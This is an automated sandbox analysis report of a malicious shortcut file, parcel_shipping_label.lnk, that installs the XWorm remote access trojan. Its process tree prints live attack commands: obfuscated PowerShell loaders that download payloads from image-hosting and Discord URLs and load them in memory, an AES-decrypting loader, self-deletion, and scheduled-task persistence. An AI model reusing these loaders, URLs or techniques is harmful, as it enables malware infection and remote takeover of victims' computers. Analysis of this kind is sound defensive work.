Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    136s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/04/2024, 11:45

General

  • Target

    parcel_shipping_label.lnk

  • Size

    1002B

  • MD5

    a0abe64514f25b2564718dadc6f077c9

  • SHA1

    aa6b93ee0817e74d66d8fbcb475442d7071c1b6f

  • SHA256

    82ba6734f458e88dc2465ff8152fb0de8a33e08163da64c9653d8c89f9dae8c2

  • SHA512

    ff504e33e1dbd8af157e6c1fb3fdfc0d8fe735e1f347cd90f9cc15ec04151b06078e1d926b9fd25e817d2417185ad1972d759f113d96c2c3595d2ec88cfc4402

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

UxOlPOZZNwNV9srk

Attributes
  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/Dh8E7H3R

aes.plain

Extracted

Family

xworm

Version

3.1

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/Dh8E7H3R

Signatures

  • Detect Xworm Payload 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\parcel_shipping_label.lnk
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3236
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\logo\receipt.vbs"
      2⤵
      • Blocklisted process makes network request
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwDgTremDgTreGUDgTreODgTreDgTreyDgTreDEDgTreYwBmDgTreDcDgTreNgBkDgTreGUDgTreYgBiDgTreDUDgTreYQDgTrezDgTreDYDgTreNwBiDgTreDQDgTreZDgTreDgTrewDgTreGMDgTreMQDgTrexDgTreGYDgTreNwDgTrewDgTreDIDgTreMDgTreDgTre4DgTreGIDgTreZgBjDgTreDYDgTreYwBiDgTreDQDgTreNDgTreDgTre5DgTreDYDgTreZQDgTre0DgTreDEDgTreODgTreBmDgTreDIDgTreYQDgTre4DgTreDcDgTreZDgTreDgTrezDgTreDMDgTreNDgTreDgTre3DgTreGMDgTreNgDgTre0DgTreDIDgTreNDgTreDgTre3DgTreDDgTreDgTreZQDgTre5DgTreGQDgTrePQBtDgTreGgDgTreJgDgTrewDgTreGUDgTreZDgTreDgTre0DgTreGMDgTreMDgTreDgTre2DgTreDYDgTrePQBzDgTreGkDgTreJgDgTrewDgTreGUDgTreMgBjDgTreGUDgTreMQDgTre2DgTreDYDgTrePQB4DgTreGUDgTrePwB0DgTreHgDgTredDgTreDgTreuDgTreGQDgTrebwBvDgTreGgDgTreLwDgTre4DgTreDcDgTreMDgTreDgTrewDgTreDkDgTreNDgTreDgTrezDgTreDYDgTreMgDgTrezDgTreDDgTreDgTreMQDgTre3DgTreDgDgTreNwDgTre0DgTreDIDgTreMgDgTrexDgTreC8DgTreOQDgTrezDgTreDgDgTreMwDgTrewDgTreDDgTreDgTreNQDgTre2DgTreDUDgTreNwDgTre5DgTreDIDgTreODgTreDgTrewDgTreDYDgTreMQDgTre4DgTreDEDgTreMQDgTrevDgTreHMDgTredDgTreBuDgTreGUDgTrebQBoDgTreGMDgTreYQB0DgTreHQDgTreYQDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecDgTreBwDgTreGEDgTreZDgTreByDgTreG8DgTreYwBzDgTreGkDgTreZDgTreDgTreuDgTreG4DgTreZDgTreBjDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:64
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&e821cf76debb5a367b4d0c11f70208bfc6cb4496e418f2a87d3347c642470e9d=mh&0ed4c066=si&0e2ce166=xe?txt.dooh/8700943623017874221/9383005657928061811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2624
          • C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
            5⤵
              PID:4712
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
              5⤵
                PID:4276
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4932
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tqnyya.bat" "
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2388
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\tqnyya.bat"
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3544
                    • C:\Users\Admin\AppData\Local\Temp\tqnyya.bat.exe
                      "C:\Users\Admin\AppData\Local\Temp\tqnyya.bat.exe" -w hidden -c $ZiYB='TWHQYraWHQYnsWHQYfoWHQYrmFiWHQYnalWHQYBloWHQYckWHQY'.Replace('WHQY', '');$TWWf='CreWHQYateWHQYDeWHQYcryWHQYptWHQYorWHQY'.Replace('WHQY', '');$JFEq='LoWHQYadWHQY'.Replace('WHQY', '');$PgsW='GetWHQYCuWHQYrWHQYreWHQYntWHQYPrWHQYoWHQYceWHQYssWHQY'.Replace('WHQY', '');$tNsL='LaWHQYstWHQY'.Replace('WHQY', '');$GjzR='MaiWHQYnWHQYModuWHQYleWHQY'.Replace('WHQY', '');$aRAn='SpWHQYlitWHQY'.Replace('WHQY', '');$TNHv='IWHQYnWHQYvokWHQYeWHQY'.Replace('WHQY', '');$QZWA='EntWHQYrWHQYyPoWHQYintWHQY'.Replace('WHQY', '');$vNAk='FroWHQYmBaWHQYsWHQYe6WHQY4SWHQYtriWHQYngWHQY'.Replace('WHQY', '');$UYdq='ReWHQYaWHQYdLiWHQYnWHQYeWHQYsWHQY'.Replace('WHQY', '');$JZFz='ChWHQYangWHQYeWHQYExtWHQYensiWHQYoWHQYnWHQY'.Replace('WHQY', '');function swdxJ($huXUQ){$dLULt=[System.Security.Cryptography.Aes]::Create();$dLULt.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dLULt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dLULt.Key=[System.Convert]::$vNAk('g+qN2trIRo/tbHFrQCd/eQDgIirzmSlbfVKkYlD3YWc=');$dLULt.IV=[System.Convert]::$vNAk('eff0gny3xfxcI+yMk6XV2Q==');$lfKNS=$dLULt.$TWWf();$QwlmH=$lfKNS.$ZiYB($huXUQ,0,$huXUQ.Length);$lfKNS.Dispose();$dLULt.Dispose();$QwlmH;}function ktBmv($huXUQ){$NioEV=New-Object System.IO.MemoryStream(,$huXUQ);$xipLu=New-Object System.IO.MemoryStream;$BScFk=New-Object System.IO.Compression.GZipStream($NioEV,[IO.Compression.CompressionMode]::Decompress);$BScFk.CopyTo($xipLu);$BScFk.Dispose();$NioEV.Dispose();$xipLu.Dispose();$xipLu.ToArray();}$zaZHN=[System.Linq.Enumerable]::$tNsL([System.IO.File]::$UYdq([System.IO.Path]::$JZFz([System.Diagnostics.Process]::$PgsW().$GjzR.FileName, $null)));$GGCVp=$zaZHN.Substring(2).$aRAn(':');$GwZBd=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[0])));$gptFX=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[1])));[System.Reflection.Assembly]::$JFEq([byte[]]$gptFX).$QZWA.$TNHv($null,$null);[System.Reflection.Assembly]::$JFEq([byte[]]$GwZBd).$QZWA.$TNHv($null,$null);
                      8⤵
                      • Checks computer location settings
                      • Drops startup file
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:788
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(788);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
                        9⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4108
                      • C:\Windows\SysWOW64\schtasks.exe
                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "tqnyya" /tr "C:\Users\Admin\AppData\Roaming\tqnyya.bat"
                        9⤵
                        • Creates scheduled task(s)
                        PID:3168
      • C:\Windows\SYSTEM32\cmd.exe
        C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\tqnyya.bat"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:3300
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\tqnyya.bat
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4852
          • C:\Users\Admin\AppData\Roaming\tqnyya.bat.exe
            "C:\Users\Admin\AppData\Roaming\tqnyya.bat.exe" -w hidden -c $ZiYB='TWHQYraWHQYnsWHQYfoWHQYrmFiWHQYnalWHQYBloWHQYckWHQY'.Replace('WHQY', '');$TWWf='CreWHQYateWHQYDeWHQYcryWHQYptWHQYorWHQY'.Replace('WHQY', '');$JFEq='LoWHQYadWHQY'.Replace('WHQY', '');$PgsW='GetWHQYCuWHQYrWHQYreWHQYntWHQYPrWHQYoWHQYceWHQYssWHQY'.Replace('WHQY', '');$tNsL='LaWHQYstWHQY'.Replace('WHQY', '');$GjzR='MaiWHQYnWHQYModuWHQYleWHQY'.Replace('WHQY', '');$aRAn='SpWHQYlitWHQY'.Replace('WHQY', '');$TNHv='IWHQYnWHQYvokWHQYeWHQY'.Replace('WHQY', '');$QZWA='EntWHQYrWHQYyPoWHQYintWHQY'.Replace('WHQY', '');$vNAk='FroWHQYmBaWHQYsWHQYe6WHQY4SWHQYtriWHQYngWHQY'.Replace('WHQY', '');$UYdq='ReWHQYaWHQYdLiWHQYnWHQYeWHQYsWHQY'.Replace('WHQY', '');$JZFz='ChWHQYangWHQYeWHQYExtWHQYensiWHQYoWHQYnWHQY'.Replace('WHQY', '');function swdxJ($huXUQ){$dLULt=[System.Security.Cryptography.Aes]::Create();$dLULt.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dLULt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dLULt.Key=[System.Convert]::$vNAk('g+qN2trIRo/tbHFrQCd/eQDgIirzmSlbfVKkYlD3YWc=');$dLULt.IV=[System.Convert]::$vNAk('eff0gny3xfxcI+yMk6XV2Q==');$lfKNS=$dLULt.$TWWf();$QwlmH=$lfKNS.$ZiYB($huXUQ,0,$huXUQ.Length);$lfKNS.Dispose();$dLULt.Dispose();$QwlmH;}function ktBmv($huXUQ){$NioEV=New-Object System.IO.MemoryStream(,$huXUQ);$xipLu=New-Object System.IO.MemoryStream;$BScFk=New-Object System.IO.Compression.GZipStream($NioEV,[IO.Compression.CompressionMode]::Decompress);$BScFk.CopyTo($xipLu);$BScFk.Dispose();$NioEV.Dispose();$xipLu.Dispose();$xipLu.ToArray();}$zaZHN=[System.Linq.Enumerable]::$tNsL([System.IO.File]::$UYdq([System.IO.Path]::$JZFz([System.Diagnostics.Process]::$PgsW().$GjzR.FileName, $null)));$GGCVp=$zaZHN.Substring(2).$aRAn(':');$GwZBd=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[0])));$gptFX=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[1])));[System.Reflection.Assembly]::$JFEq([byte[]]$gptFX).$QZWA.$TNHv($null,$null);[System.Reflection.Assembly]::$JFEq([byte[]]$GwZBd).$QZWA.$TNHv($null,$null);
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1972
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1972);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
              4⤵
              • Suspicious behavior: EnumeratesProcesses
